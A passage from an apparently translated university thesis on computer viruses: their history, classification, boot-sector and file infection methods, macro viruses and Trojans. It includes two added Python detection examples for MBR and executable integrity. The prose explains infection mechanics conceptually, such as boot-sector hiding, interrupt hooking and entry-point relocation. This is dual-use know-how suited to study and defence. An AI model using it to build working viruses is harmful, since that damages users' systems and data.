
Table of contents

Introduction .......................................................... 3
Acknowledgements ...................................................... 4
Chapter 1. OVERVIEW OF COMPUTER VIRUSES ............................... 5
1.1. INTRODUCTION TO COMPUTER VIRUSES ................................. 5
1.1.1. Computer viruses and their properties .......................... 5
1.1.2. Names of computer viruses ...................................... 9
1.1.3. Classification of computer viruses ............................ 11
1.2. BOOT VIRUSES .................................................... 15
1.2.1. Method of spreading ........................................... 15
1.2.2. Classification of boot viruses ................................ 16
1.2.3. Program structure of a B-Virus ................................ 18
1.3. FILE VIRUSES .................................................... 20
1.3.1. Method of spreading ........................................... 20
1.3.2. Classification of F-Viruses ................................... 21
1.3.3. Program structure of an F-Virus ............................... 21
1.4. MACRO VIRUSES ................................................... 23
1.4.1. Definition .................................................... 23
1.4.2. The macro virus W97M/Antivi.a ................................. 24
1.5. TROJANS ......................................................... 26
1.5.1. Definition of a Trojan ........................................ 26
1.5.2. How Trojans infect ............................................ 26
1.5.3. The danger of Trojans ......................................... 28
1.5.4. Classification of Trojans ..................................... 28
1.5.5. Purpose of Trojans ............................................ 29
1.5.6. How Trojans operate ........................................... 30
1.5.7. Ports of some common Trojans .................................. 31
1.6. INTERNET WORMS .................................................. 32
1.6.1. General introduction .......................................... 32
1.6.2. Stages of development of Internet worms ....................... 35

Chapter 2. IDENTIFYING AND DETECTING VIRUSES ......................... 44
2.1. VIRUS IDENTIFICATION TECHNIQUES ................................. 44
2.1.1. Exact pattern identification (signature-based detection) ...... 44
2.1.2. Identification by representative code ......................... 45
2.1.3. String scanning ............................................... 46
2.1.4. Suspicious behaviour identification ........................... 48
2.1.5. Continuous monitoring ......................................... 49
2.1.6. Combining the methods ......................................... 49
2.2. VIRUS DETECTION METHODS ......................................... 50
2.2.1. Scanner ....................................................... 50
2.2.2. Checksum ...................................................... 50
2.2.3. Guard ......................................................... 51

Chapter 3. PREVENTING VIRUSES ........................................ 52
3.1. SEARCHING IN MEMORY ............................................. 52
1/. For B-Viruses: ................................................... 52
2/. For RF-Viruses: .................................................. 53
3.2. REMOVING VIRUSES AND RECOVERING DATA ............................ 53
3.2.1. B-Virus ....................................................... 53
3.2.2. F-Virus ....................................................... 54
3.2.3. Trojan viruses ................................................ 55
3.2.4. Worms ......................................................... 57
3.3. CREATING A COMPUTER VIRUS ....................................... 58

Conclusion ........................................................... 68

Introduction

Computer viruses are today a source of worry for those who work in computing and a source of fear for users whose machines become infected. When their computer is infected, users can only rely on the anti-virus software available on the market; when that software fails to detect or remove the virus, they are left in a very difficult position with no idea what to do. For that reason, a basic understanding of the system, mechanism and operating principles of computer viruses is necessary. On that basis one can take a sound view of computer viruses when preventing, checking for and removing them, and when analysing and studying a newly appeared virus. Each operating system has its own kinds of virus that run on it: for DOS there are DOS viruses, for Windows there are Windows viruses. The development of computing is tied to the development of computer viruses: whenever a new piece of software, program or operating system appears, new viruses appear with it, and anti-virus programs follow. That is why viruses must be studied, identified and detected, so that suitable measures to block and eliminate them can achieve the best results.

Acknowledgements

I wish to express my deep respect and gratitude to Assoc. Prof. Dr. Trinh Nhat Tien and the lecturers of the Faculty of Information Technology, Hai Phong Private University, who guided and encouraged me while I wrote this thesis. I thank the teachers of the university for creating the conditions that helped me complete this thesis. I also thank my family and friends, who helped, encouraged and supported me while I was writing it. As time was short and my experience is limited, shortcomings are unavoidable. I look forward to comments and suggestions from my teachers and friends. My sincere thanks.

Chapter 1. OVERVIEW OF COMPUTER VIRUSES

To detect and remove computer viruses, one must first understand their nature. As a general principle, removing a virus mostly means undoing what the virus did. This chapter therefore focuses on the mechanisms by which viruses operate, in order to clarify the nature of computer viruses; on that basis a program to find and remove viruses can be built.

1.1. INTRODUCTION TO COMPUTER VIRUSES
1.1.1. Computer viruses and their properties
1.1.1.1. Concept

Computer virus …

1.1.1.2. Properties

Ability to spread: this is the most important property of every kind of virus. The ability to spread is what gives a virus its strength, and it is what distinguishes a virus from other malicious programs that can also damage data and computers but cannot spread on their own.

Stealth: this property lets a virus evade detection by anti-virus programs, speeds up infection and ensures the virus's survival. A virus can minimise its size by optimising its code or by using self-compression and decompression routines. This, however, also means the virus must reduce its complexity, which makes its code easier for programmers to analyse.

Destructiveness: some viruses lack this property, simply because they were written for amusement or to test their ability to spread. Many viruses, however, are highly destructive.

1.1.1.3. History of computer viruses

Computer viruses have a fairly long history; they have always gone hand in hand with computers. As software and hardware technology developed, computer viruses developed with them; when operating systems changed, viruses changed too, to suit the new operating system. Many sources describe the origin of computer viruses [1,2,3,4], but most of them relate that origin to the game Core War.

1983 The principle of the game Core War

Core War is a battle of wits between two computer programs written by two programmers. Each player places a self-replicating program called an Organism into the computer's memory. When the game starts, each player tries to destroy the opponent's Organism and replicate their own; the winner is the player who makes the most copies. Core War was kept secret until 1983, when Ken Thompson, author of the first version of the UNIX operating system, revealed it on receiving one of computing's most prestigious prizes, the A.M. Turing Award. In his acceptance speech he put forward an idea for a computer virus based on Core War. In the same year, 1983, Dr Frederick Cohen demonstrated the existence of computer viruses. In May 1984 the magazine Scientific American published a description of Core War and gave readers instructions for the game; from then on computer viruses appeared, and with them the battle between those who write viruses and those who remove them.

1986 The Brain virus

This can be considered the first computer virus in the world. Brain quietly made its way from Pakistan into the United States, its first target being the University of Delaware. Another place in the world that also described the appearance of the virus was the Hebrew University in Israel.

1987 The Lehigh virus

Lehigh is the name of a virus that appeared in 1987 at the university of the same name. Several other viruses appeared in this period, notably worm viruses, which are network-based and appeared along with server systems. The Jerusalem virus caused losses to IBM, spreading at an alarming rate: 500,000 copies in one hour.

1988 Viruses spreading over networks

On 2 November 1988 Robert Morris released a virus into the most important computer network in the United States, causing major damage. From then on people began to see how dangerous computer viruses are.

1989 The AIDS Trojan

Trojans, also called Trojan horses, appeared. They are not computer viruses, but they always go together with the concept of a virus. Once attached to a computer, a Trojan steals some information from it and sends it to an address the Trojan's owner has chosen, or simply destroys the data on that computer.

1991 The Tequila virus

This was the first virus that specialists call a polymorphic virus. It was a real headache for anti-virus researchers, and it was not easy to remove. Such viruses can change their form after every infection, which makes detecting them very difficult.

1992 The Michelangelo virus

Following the birth of polymorphic viruses in 1991, the power of computer viruses grew rapidly in 1992; virus writers created extremely complex polymorphism for each virus.

1995 The Concept virus

Almost ten years after the first computer virus appeared, this was the first virus whose operating principle was almost entirely different from that of earlier viruses. Viruses that follow the principle of Concept were later collectively called macro viruses; they attack Microsoft's document-editing applications (Word, Excel, PowerPoint).

1996 The Boza virus

When Microsoft moved to the Windows 95 operating system and believed that viruses could not attack it, the Boza virus appeared in 1996 and was able to infect Windows.

1999 The Melissa and Bubbleboy viruses

A new step in virus development: the Melissa worm not only combined the features of an Internet worm and a macro virus but also exploited an everyday tool, Microsoft Outlook Express. When a computer was infected with Melissa, the worm spread itself without the computer's owner knowing. In four days Melissa infected 250 thousand computers around the world over the Internet, including in Vietnam, causing hundreds of millions of USD in damage. Melissa proved that the Internet is an effective medium through which a computer virus can spread around the globe within hours. In 1999, besides Melissa, the Chernobyl virus, also known as CIH, destroyed the data of millions of computers worldwide, causing nearly 1 billion USD in damage on 26 April 1999.

2000 DoS viruses and Love Letter

This can be considered the largest virus incident ever. Love Letter originated in the Philippines, created by a student there; within six hours it infected 20 countries around the world, including Vietnam, infecting 55 million computers and causing 8.7 billion USD in damage.

As for DoS (Denial of Service) viruses, they spread everywhere and lie dormant wherever they land. Finally, all at once, they launch a denial-of-service attack (continuous requests from many computers at the same time, so that the attacked servers can no longer serve and end up refusing new requests) against server systems, either when their controller gives the order or at a predetermined time. A telephone system in Spain was the first place to be attacked.

2001 The Winux Windows/Linux virus, Nimda, Code Red

The Winux Windows/Linux virus marked the arrival of viruses that can infect the Linux operating system. Nimda and Code Red attack their targets by many different routes (server to server or server to workstation); as of September 2002 there were still organisations in Vietnam with networks of hundreds of computers infected by Nimda. They point to a new trend in computer viruses: all in one, a single virus that contains many viruses.

2002 A wave of new kinds of virus

In January 2002 a virus appeared that infects .SWF files. In March 2002 the SharpA worm (written in C#) appeared. In May 2002 SQLSpider appeared, attacking programs that use SQL. Perrun infects .JPEG image files. Scalper attacks FreeBSD/Apache web servers.

1.1.2. Names of computer viruses

The name of a virus is generally given by the first researcher to encounter it. The problem is that several researchers may encounter the same new virus, and each names it differently. Competition among security software companies to be the first to name a new virus leads to the situation common today, in which a virus goes by many different names.

Disagreement over names and naming of viruses creates confusion in this field, which in turn hampers countermeasures and helps viruses spread. This was also a topic discussed at the worldwide anti-virus conference (Virus Bulletin 2003) held in Toronto, Canada, at the end of September 2003. In the early 1990s a naming convention was proposed by the Computer Antivirus Research Organization (CARO). Officially introduced in 1991 and occasionally supplemented since, the system lays down rules on what may and may not be used in naming a virus, and establishes a set of virus characteristics such as severity, the platform affected and the damage it causes. Nick FitzGerald, representing CARO, said when speaking about the current naming system that their rules remain in force. The technical naming style matters to virus experts, who can tell from the name what kind of virus it is and which variant. It matters little to most computer users, who tend to remember virus names such as I Love You and Melissa (names taken from events) rather than VBS.LoveLetter.A and W97.Mellisa.A. In short, disagreement over virus naming among researchers and security software companies gives one virus many names. This confuses people, but anti-virus software looks only at the virus's characteristics and identifying marks, and does not care about its name when removing it.

1.1.3. Classification of computer viruses

Roughly speaking, computer viruses are divided into five kinds [1]:

Kind 1: Boot viruses (B-Virus)

Their infection environment is the Boot Record of floppy disks and the Master Boot Record or Boot Record of hard disks, the areas that hold the code used to start the computer. A virus of this kind is activated every time the computer boots from an infected disk. Once awakened, it goes resident in memory and quietly waits for a chance to spread to other disks during disk accesses.

Kind 2: File viruses (F-Virus)

These usually infect executable files: .EXE, .COM, .DLL, .BIN, .SYS and so on. A virus of this kind runs when an infected executable is run; it then immediately tries to infect, or goes resident in memory and waits for a chance to infect other executables.

Kind 3: Macro viruses

This kind differs from traditional F-Viruses in that its targets are not executable programs but the document and spreadsheet files of application software equipped with a complex macro language, such as Microsoft Excel in Microsoft's Office suite. When such document files (or Excel files) are processed by Microsoft Word (or Microsoft Excel), the macro virus is activated and tries to spread to other Word and Excel files.

Kind 4: Trojan viruses

The term comes from an ancient story, the war between the Greeks and the people of Troy. Troy was a strong fortress that the Greek army could not penetrate. Someone devised a trick: pretend to make peace, then present Troy with a giant wooden horse. Once the horse had been brought inside the city, at night the soldiers in its belly came out and captured the city from within.

That approach is exactly the one computer Trojans use. First the hacker somehow tricks the victim into using their program. When the program runs, it looks on the outside like any ordinary program. At the same time, however, part of the Trojan secretly installs itself on the victim's machine. At some predetermined moment the program deletes data or sends the information the hacker wants to a predetermined network address. Unlike a virus, a Trojan is a piece of program code that does not spread at all. It can only be installed when activated, and can only reach another computer when someone sends it, whereas a virus searches for victims by itself. Software containing a Trojan is usually distributed as a utility or as an attractive new program, to draw users in. Besides traditional information-stealing Trojans, some new terms have been introduced to name Trojans with particular characteristics:

BackDoor: a Trojan that (after being installed on the victim's machine) opens a service port allowing the attacker (hacker) to connect remotely to the victim's machine, from where it receives and executes the attacker's commands.

Adware and spyware: these annoy users by deliberately changing the default web page (home page) and the default search page, or by continually popping up advertising pages while the user is browsing. They usually sneak onto the machine when the user unwittingly visits websites with unwholesome content or software-cracking sites, or arrive with untrustworthy free software or cracked software (crack, keygen).

Kind 5: Internet worms

Internet worms are a significant step forward for viruses. An Internet worm combines the destructiveness of a virus, the stealth of a Trojan and rapid spread over the Internet. Spreading so quickly, they paralyse whole rows of server systems and overload network links. An Internet worm usually spreads by looking up the addresses in the address book of the machine it has infected, typically those of relatives and customers, and then sending copies of itself to the addresses it finds, with the sender address usually being the owner of that computer. The danger is that all this happens without the user knowing; only when they are told that they have sent a virus to someone else do they realise their machine is infected. Behaving in exactly the same way on each victim machine, an Internet worm can spread around the world exponentially, which explains how in just a few hours the Melissa and Love Letter worms could reach tens of millions of computers worldwide. The name Internet worm reflects how these worms crawl from one computer to the next along the branches of the Internet tree. Given such fast and wide spread, Internet worms are usually given many special features by their authors; for example they can be set to a fixed date and time at which all the victim machines attack a given address at once, and such attacks are very hard to defend against and their consequences hard to repair. Internet worms can also let their owner access the victim's machine and do anything a legitimate user of that machine could.

The term Internet worm also covers viruses that spread over peer-to-peer file-sharing networks, viruses that spread over chat services, and especially viruses that spread by exploiting software vulnerabilities. Software (especially operating systems and the services on them) always contains latent bugs (for example buffer overflows) that are not always easy to find. When a software vulnerability is discovered, viruses that exploit it soon follow, silently infecting remote computers without the owner's knowledge. From those computers the worm goes on to crawl to other computers on the Internet in the same way. Classifying viruses gives us a sound view of computer viruses, from which effective methods of stopping them can be built.

1.2. BOOT VIRUSES
1.2.1. Method of spreading

After POST (Power On Self Test), the first sector of the boot disk is read into memory at address 0:07C00h, and a check is made whether it is a valid boot sector by looking for the identifier 0AA55h at the end of the sector. This check, however, does not prevent someone from replacing the boot code with a different program written with harmful intent, and that is exactly how a B-Virus spreads. On a floppy disk the first sector is always the Boot sector, so infection is simply a matter of replacing that sector with the virus's code. On a hard disk divided into partitions, infection is more complicated: the Master Boot sector is read first, and only after the active partition has been checked is the corresponding Boot sector read. A virus writer can therefore choose one of two places to store the virus code: the Master Boot sector or the Boot sector. A B-Virus stored in the Master is always loaded into memory first, whatever operating system is used afterwards, so it can spread very widely. The problem such a virus faces is that it must preserve the partition table, since any damage to this area leads to trouble with the hard disk. The Boot sector is more convenient because of the disk parameter table it contains, and the spreading code written for floppy disks can be reused for hard disks. Both methods have been used by B-Viruses, but today most of them infect the Master Boot sector.

The key problem this kind of virus must solve is the disk's old Boot sector (Master Boot sector). The virus substitutes a new Boot sector, but it cannot take over all the work of the old one, because that sector holds information about the disk and the virus cannot know precisely everything it must do. For this reason most B-Viruses do not discard the old Boot sector; instead they hide it somewhere on the disk and, after completing their installation, read it back and hand control to its code (some viruses, however, write their code over the old Boot sector's code, keep only the disk information, and do not hide the sector anywhere). The old Boot sector then carries on as normal. Choosing where to hide the old Boot sector is difficult, since every area of the disk can be modified: the FAT, the root directory and above all the data area. Based on how they solve this problem of hiding the old Boot sector, B-Viruses fall into two classes: SB-Virus and DB-Virus.
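As an added example (not from the thesis), the following Python code parses a 512-byte Master Boot sector image, applies the same 0AA55h signature test the BIOS performs, decodes the partition table, and compares the code area with a stored baseline hash; it shows why the signature check alone cannot catch a substituted boot sector while a checksum baseline can. The sample sectors, the stub bytes in them and all function names are constructed for this example.

```python
import hashlib
import struct

SECTOR_SIZE = 512
PART_TABLE_OFFSET = 0x1BE          # byte 446: start of the four 16-byte partition entries
SIGNATURE = b"\x55\xAA"            # 0AA55h stored little-endian at bytes 510-511


def has_valid_signature(sector):
    """The only test the BIOS performs before jumping to 0:7C00h."""
    return len(sector) == SECTOR_SIZE and sector[510:512] == SIGNATURE


def parse_partition_table(sector):
    """Decode the four partition entries: status, type, start LBA and length."""
    entries = []
    for i in range(4):
        off = PART_TABLE_OFFSET + 16 * i
        status, _chs_start, ptype, _chs_end, lba_start, nsectors = struct.unpack(
            "<B3sB3sII", sector[off:off + 16])
        entries.append({"active": status == 0x80, "type": ptype,
                        "lba_start": lba_start, "sectors": nsectors})
    return entries


def boot_code_digest(sector):
    """Hash only the code area (bytes 0-445). The partition table is left out
    because legitimate repartitioning changes it without touching the code."""
    return hashlib.sha256(sector[:PART_TABLE_OFFSET]).hexdigest()


def check_sector(sector, baseline_digest, baseline_table):
    """Return a list of findings for a sector read back from disk."""
    findings = []
    if not has_valid_signature(sector):
        findings.append("missing 0AA55h signature: not a bootable sector")
        return findings
    if boot_code_digest(sector) != baseline_digest:
        findings.append("boot code differs from baseline: possible B-Virus")
    if parse_partition_table(sector) != baseline_table:
        findings.append("partition table differs from baseline")
    return findings


def build_sector(boot_code, partitions):
    """Assemble a sector from code bytes and (active, type, lba, size) tuples."""
    assert len(boot_code) <= PART_TABLE_OFFSET
    sector = bytearray(boot_code.ljust(PART_TABLE_OFFSET, b"\x00"))
    for active, ptype, lba, size in partitions + [(False, 0, 0, 0)] * (4 - len(partitions)):
        sector += struct.pack("<B3sB3sII", 0x80 if active else 0, b"\0\0\0",
                              ptype, b"\0\0\0", lba, size)
    return bytes(sector + SIGNATURE)


# Constructed sample: a clean MBR with a short stub and one active FAT16 partition.
CLEAN_CODE = b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C\xFB" + b"\x90" * 40
PARTS = [(True, 0x06, 63, 2_000_000)]
CLEAN_MBR = build_sector(CLEAN_CODE, PARTS)

# Constructed sample: same partition table and signature, but a replaced code
# area, which is what a B-Virus stored in the Master Boot sector leaves behind.
SUBSTITUTED_MBR = build_sector(b"\xEB\x1C\x90" + b"\x00" * 30 + b"PLACEHOLDER", PARTS)

BASELINE_DIGEST = boot_code_digest(CLEAN_MBR)
BASELINE_TABLE = parse_partition_table(CLEAN_MBR)

if __name__ == "__main__":
    for name, sec in (("clean", CLEAN_MBR), ("substituted", SUBSTITUTED_MBR)):
        print(name, check_sector(sec, BASELINE_DIGEST, BASELINE_TABLE) or ["ok"])
```

Both samples pass the BIOS signature test; only the baseline comparison reports the substituted code.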

1.2.2. Classification of boot viruses

B-Viruses hide the old Boot sector in one of two ways. In the first, the virus stores the old Boot sector at a fixed location on every disk and accepts the risk that the sector may be lost by being overwritten, although the hiding place chosen is the one least likely to be overwritten. This approach is simple, so the program is usually small: it uses only one sector to replace the old Boot sector, which is why this kind is called an SB-Virus (Single Boot Virus). In the second, the virus hides the Boot sector in a safe place on the disk, to avoid any possible loss. Because the safe area can be of any size, the virus usually occupies several sectors and is split into two parts: one in the Boot sector and one in the safe area. Because of this, the kind is called a DB-Virus (Double Boot sector).

1/. SB-Virus
Because it accepts possible data loss, the program is short and occupies only one sector. An SB-Virus usually chooses the place least likely to be overwritten to hide the old Boot sector. On floppy disks the usual choices are:
- The last sectors of the root directory, because users rarely use up all the entries of the root directory.
- The last sectors of the disk, because when DOS allocates clusters to a file it starts looking for free clusters from the beginning of the data area, based on the entries in the FAT.
On hard disks it is simpler: on most disks track 0 holds only the Master Boot Record, in one sector, and the remaining sectors on that track are empty and unused. SB-Viruses, and most DB-Viruses, therefore choose the empty sectors on this track as their hiding place.

2/. DB-Virus
- For most viruses, 512 bytes (the usual size of a sector) is not much room. They therefore replace the old Boot sector with a fake Boot sector whose job is to load the rest of the virus code from the disk into memory and hand it control. Only after this part has been installed is the real Boot sector loaded into memory. The remaining virus code can lie in one of the following places:
- On floppy disks: hidden from DOS by using free clusters; the FAT entries for these clusters are marked bad so that DOS will not use them again. A second method, with the advantage of escaping DOS's control entirely, is to create an extra track after the last track DOS can manage (this applies only to floppy disks). Its drawback is that some floppy disks cannot handle it, and the added track causes errors when the virus tries to spread. The first method is therefore used more often by viruses.
- On hard disks: the virus code may be hidden in the sectors after the Master Boot Record, in the last sectors of the partition after the partition has been shrunk, or as on floppy disks (using free clusters and marking them bad in the FAT so that DOS will not use them).
In general the program structure of SB-Viruses and DB-Viruses is the same.

1.2.3. Program structure of a B-Virus

Because it is handed control only once, at boot time, the virus must find a way to survive and be reactivated when needed; in other words it behaves like a pop-up TSR (Terminate and Stay Resident) program. The virus program is therefore divided into two parts: the initialisation part and the body.

Initialisation part
First the virus goes resident by copying itself into high memory. Then, to ensure it can pop up, it always hooks interrupt 13h. To support its destructive and obfuscation functions, the virus may also hook interrupts 8 and 9. Once initialisation is complete, the old Boot sector is read back to its proper place and given control.

Body
This is the important part of the virus; it holds the code that largely replaces the interrupts the virus hooks. It can be divided into four parts.
+ Spreading part: the main part of the body, replacing interrupt 13h; it spreads by copying itself to any disk not yet infected.
+ Obfuscation and disguise part: once the nature of a virus has been thoroughly studied, detecting and removing it is no longer complicated. Obfuscation makes it harder for anti-virus researchers to find and remove the virus and recover data. Disguise makes the virus look normal from the outside, so that neither anti-virus researchers nor users notice it.
+ Destructive part: not necessarily present, though most viruses have one, ranging from displaying text, causing small malfunctions and teasing the user to destroying the data on the computer. A virus may cause damage at random or on a timer. A timed virus checks some value (the virus may use the day, hour, month, year, the number of infections or the number of hours the machine has run); when that value equals or exceeds the threshold, it starts its destruction.
+ Data part: stores intermediate information, the virus's own internal variables, and the old Boot sector.

1.3. FILE VIRUSES
1.3.1. Method of spreading

Traditional file viruses generally spread only to executable files (usually .com or .exe files). When spreading, a traditional F-Virus must follow the rule that control must be in the virus's hands before the virus returns it to the infected file (though a few viruses take control only after some instructions of the infected file have run). All the file's data must be preserved once control is returned to the file. To date, F-Viruses have the following basic infection methods:

1/. Prepending
This method usually applies only to .COM files, meaning programs that always start at PSP:100h. Exploiting this, the virus inserts its code at the start of the infected file and pushes the whole file down so that it immediately follows the virus. Advantage: the virus code is easy to write and is in .COM format. It also makes recovery harder for the anti-virus researcher, who must read the whole infected file into memory and write it back. Disadvantage: before returning control to the file the virus must ensure the entry point is PSP:100h, so it has to move the whole program to that address.

2/. Appending
This method is found in most kinds of F-Virus and spreads more widely than the previous one. As the name suggests, the virus is attached right after the infected file. Because the virus code is then not at the program's entry point, the virus relocates the entry point of the infected file by changing some of the file's data so that the entry point points at its code. Advantage: it spreads to every kind of executable, usually .COM, .EXE, .BIN and .OVL files; the change to the infected file's data is minor and seizing control is not very difficult. Disadvantage: it is easy for the anti-virus researcher to recover data, and the virus code is hard to position when infecting a file, because the infected file's size is arbitrary.

3/. Overwriting empty regions

This method aims to overcome the drawback of the two methods above, that they increase the size of the infected file (which on some systems makes the virus easy to detect). With this method the virus looks for empty regions in the file and writes its code there. Advantage: it makes detecting and removing the virus harder. Disadvantage: the virus code is hard to write and the scope for spreading is narrow, since very few files have empty regions large enough for the virus.
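As an added example (not from the thesis) covering the three infection methods of section 1.3.1, the following Python code locates the entry point of DOS .COM and .EXE images and, given a baseline record of the clean file, reports the layout each method leaves behind: an entry point moved into bytes added at the end (appending), the original start pushed down the file (prepending), or changed contents with no size change (overwriting an empty region). The .COM and .EXE samples, their stub bytes and all function names are constructed for this example.

```python
import hashlib
import struct

HEAD_LEN = 64   # bytes of the original file start kept in the baseline record


def com_entry_offset(data):
    """File offset the first instruction transfers control to.
    A clean .COM starts executing at offset 0 (PSP:100h). A JMP rel16 (E9)
    at offset 0 lands at file offset 3 + rel, since the image is loaded at 100h."""
    if len(data) >= 3 and data[0] == 0xE9:
        rel = struct.unpack("<h", data[1:3])[0]
        return 3 + rel
    return 0


def exe_entry_offset(data):
    """File offset of the initial CS:IP of an MZ executable."""
    if len(data) < 0x1C or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    cparhdr, = struct.unpack_from("<H", data, 0x08)   # header size in paragraphs
    ip, = struct.unpack_from("<H", data, 0x14)
    cs, = struct.unpack_from("<h", data, 0x16)        # paragraphs relative to load segment
    return cparhdr * 16 + cs * 16 + ip


def entry_offset(data):
    return exe_entry_offset(data) if data[:2] == b"MZ" else com_entry_offset(data)


def baseline_record(data):
    """What an integrity checker stores for a known-clean executable."""
    return {"size": len(data), "entry": entry_offset(data),
            "head": data[:HEAD_LEN], "digest": hashlib.sha256(data).hexdigest()}


def diagnose(baseline, data):
    """Compare a file against its baseline and name the infection pattern seen."""
    if hashlib.sha256(data).hexdigest() == baseline["digest"]:
        return []
    findings = []
    entry = entry_offset(data)
    grown = len(data) - baseline["size"]
    if grown > 0 and entry >= baseline["size"]:
        findings.append(f"entry point moved into {grown} appended bytes (appending)")
    shifted = data.find(baseline["head"])
    if grown > 0 and shifted > 0:
        findings.append(f"original code pushed down by {shifted} bytes (prepending)")
    if grown == 0:
        findings.append("contents changed without size change (overwrite of empty region)")
    if not findings:
        findings.append("modified in an unrecognised way")
    return findings


# Constructed .COM samples: a 200-byte clean file and three infected layouts.
CLEAN_COM = b"\xB4\x09\xBA\x10\x01\xCD\x21\xC3Hello$".ljust(200, b"\x00")
TAIL = b"\x90" * 5 + CLEAN_COM[:3] + b"\xCC" * 32          # 40 bytes at the end
APPENDED_COM = b"\xE9" + struct.pack("<h", 200 - 3) + CLEAN_COM[3:] + TAIL
PREPENDED_COM = b"\xCC" * 64 + CLEAN_COM
CAVITY_COM = CLEAN_COM[:100] + b"\xCC" * 40 + CLEAN_COM[140:]  # same size as clean


def make_exe(ip, cs, body):
    """Minimal MZ image with a 32-byte (2-paragraph) header."""
    header = bytearray(32)
    header[:2] = b"MZ"
    struct.pack_into("<H", header, 0x08, 2)
    struct.pack_into("<H", header, 0x14, ip)
    struct.pack_into("<h", header, 0x16, cs)
    return bytes(header) + body


EXE_BODY = b"\xB8\x00\x4C\xCD\x21".ljust(200, b"\x00")
CLEAN_EXE = make_exe(0, 0, EXE_BODY)                          # entry at offset 32
APPENDED_EXE = make_exe(8, 12, EXE_BODY + b"\xCC" * 48)       # 32 + 12*16 + 8 = 232

if __name__ == "__main__":
    base = baseline_record(CLEAN_COM)
    for name, f in (("appended", APPENDED_COM), ("prepended", PREPENDED_COM),
                    ("cavity", CAVITY_COM)):
        print(name, diagnose(base, f))
    print("exe", diagnose(baseline_record(CLEAN_EXE), APPENDED_EXE))
```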

1.3.2. Classification of F-Viruses
TF Virus (Transient File Virus):

A virus of this kind is not resident and does not hook interrupts; when the infected file runs, the virus takes control and tries to spread to as many other files as possible.

RF Virus (Resident File Virus):

A virus of this kind goes resident using various techniques and hooks interrupts, chiefly interrupt 21h; when that interrupt is invoked with certain file-related functions, the virus spreads.

1.3.3. Program structure of an F-Virus
1/. TF-Virus:

It consists of four parts: spreading, obfuscation, destruction and data. Spreading part: the main part of the virus; it spreads by copying and attaching itself to other files it finds while it has control. Because this kind is not resident, it tries to infect as many files as possible while in control. Obfuscation part: makes the virus code complicated and hard to understand, so that anti-virus researchers have difficulty finding and removing the virus and recovering data. Destructive part: similar to B-Viruses. Data part: stores intermediate information, internal variables for the virus's own use and the data of the infected file; this data is restored to the file before control is handed back to it.

2/. RF-Virus:
Because it goes resident and hooks interrupts like a B-Virus, this kind also has two main parts: initialisation and body. Initialisation part: first the virus goes resident by copying itself into memory or by using DOS's resident functions. Then, to ensure it can pop up, it always hooks interrupt 21h. For destruction and obfuscation it may also hook interrupts 8, 9 and 13h. Once initialisation is done, it restores the old data and returns control to the infected file. Body: structured like the TF-Virus, with the same four parts: spreading, obfuscation, destruction and data. But because this virus is resident, the spreading part acts on the files that are requested through interrupt 21h (which the virus has hooked). The obfuscation and disguise part is also more sophisticated than in a TF-Virus, since the virus can monitor the system while resident.

1.4. MACRO VIRUSES
1.4.1. Definition

In essence a macro virus is one or more macros (written in WordBasic, ExcelBasic or Visual Basic) that can activate and spread when the user works on a file in which they exist. The first target of macro viruses is the default template that is loaded whenever Word or Excel starts (for Word, the file NORMAL.DOT); from there they go on to spread to other files in later sessions. Normally macro viruses run only when the user runs them. But macro viruses can also run automatically, when their names coincide with those of the automatic macros or with the names of Word's or Excel's standard commands. This is how macro viruses activate and spread automatically under certain conditions. Examples of standard commands in Word are FileClose, FileOpen, FileSave and FileSaveAs, and there are five automatic macros, which run automatically when the corresponding action is performed:

Name        Runs automatically on
AutoClose   closing the document
AutoStart   starting Word
AutoExit    exiting Word
AutoNew     creating a new document
AutoOpen    opening a document

Thus, to spread, a macro virus must always have at least one macro that runs automatically. This macro contains code that spreads the virus by copying the entire virus code into other files. In addition, a macro virus may have destructive, obfuscation and disguise parts.

1.4.2. The macro virus W97M/Antivi.a
1.4.2.1. Characteristics of the virus

This macro virus infects Microsoft Word 97 documents. The virus can remove the user's macros from a file while it infects it. The virus contains messages written in Portuguese. It modifies the user's options and the Portuguese warnings inside Microsoft Word 97 macros. It hooks the option menus in order to run its code. The virus lives in a macro named Hunter. When a document is opened and it contains user macros, the virus offers to remove them with a message in Portuguese:
Hunter Voce Posui o macro [Macro name] em seu arquivo Macros dese tipo conter virus Deseja remover o Macro. aconselhavel [YES] [NO]
If the user chooses YES, the user's macro is removed. If the user chooses NO, the virus asks again:
Hunter Tem Certeza??? Alguns Virus podem danificar este computador!!! Clique Sim para remover o [Macro name] e No para manter o Macro
If the user chooses YES, the user's macro is removed. If the user chooses NO, nothing happens. The virus also disables the key combinations ALT+F8 and ALT+F11.

1.4.2.2. Signs that a computer is infected

First the virus tries to connect to the Visual Basic Editor and shows a message box:
Hunter preciso remover a protecao ANTIVIRUS ofrecida pelo Hunter antesde utilizar este servico.
The virus then copies itself to the file X.BAS in the path C:\. The existence of this file confirms that the virus has infected the machine at some point.

1.4.2.3. Method of infection

The virus hooks Microsoft Word 97's file-open event; any file opened by Microsoft Word 97 becomes infected. Other names: this macro virus is also known as Macro Word97.Hunter, W97M_Hunter and WM97/Antiv-A.

1.5. TROJANS
1.5.1. Definition of a Trojan

Many people think that if they have a good virus scanner with the latest updates they are safe: their machine will not be infected by a Trojan and no one can access their computer. This is entirely wrong. The aim of anti-virus authors is to detect new viruses, not Trojans. Only when a Trojan has infected many users do anti-virus specialists add it to their scanners, and even then this is only a very small fraction of all Trojans that anti-virus specialists detect and put on their lists of viruses to remove. Moreover, a virus scanner is not a firewall; it will not detect a Trojan and protect us while we are online. Many users do not know what a Trojan is and download files of unknown origin.

1.5.2. How Trojans infect

According to statistics from the BKIS centre, 90% of people asked whether they had downloaded or copied a file from somewhere said no, when in fact they had done so only a few days earlier. A Trojan can infect by many different routes:
- Trojans that infect via ICQ
- Trojans that infect via e-mail attachments
- Trojans with direct access

1/. Trojans that infect via ICQ:

Many people think a Trojan cannot spread while they are chatting on ICQ, but they do not consider that the person they are chatting with could send them a Trojan. ICQ allows sending an .exe file that has been altered to look like an image or audio file. For example, a Trojan is bundled with an image file and the sender changes the icon of the .exe file to that of a .bmp file; the recipient runs the Trojan without suspicion, and when the .exe runs it still shows the picture, like an image file. The result is a Trojan on the recipient's machine. That is why most users say they never ran any strange file when in fact they did. The best precaution is always to check the file type before running it.

2/. Trojans spread as e-mail attachments:

